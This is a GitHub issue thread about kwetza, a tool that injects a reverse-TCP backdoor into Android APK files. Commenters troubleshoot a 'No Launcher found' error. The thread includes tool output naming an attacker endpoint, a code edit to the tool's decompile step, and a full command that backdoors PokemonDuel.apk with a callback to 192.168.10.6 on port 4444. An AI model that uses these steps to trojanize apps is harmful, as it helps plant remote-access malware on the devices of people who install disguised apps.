Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

No Launcher found, please specify a target class #29

Open
bmont434 opened this issue Nov 23, 2017 · 5 comments
Open

No Launcher found, please specify a target class #29

bmont434 opened this issue Nov 23, 2017 · 5 comments

Comments

@bmont434
Copy link

No Launcher found, please specify a target class

@saeid5097
Copy link

what is "NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS" in kweza

@timpl23
Copy link

timpl23 commented Jun 5, 2018

I have the same error

[] DECOMPILING TARGET APK
[+] ENDPOINT IP: 0.tcp.xxxxx.io
[+] ENDPOINT PORT: 11XXX
[+] APKTOOL DECOMPILED SUCCESS
[
] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[DEBUG] Attempting to find MAIN
[+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS
root@xxxxxxxx:~/kwetza-master#

@even499891161
Copy link

Open kwetza.py script, edit:
#NOW WE NEED TO DECOMPILE THE APPLICATION
command = ["apktool", "d", ""+cwd+"/"+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]
(remove option -f and -r parameters)

@yotonz
Copy link

yotonz commented Sep 26, 2018

How to change permission

@WinMore
Copy link

WinMore commented Oct 26, 2018

add AssistActivity
python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

6 participants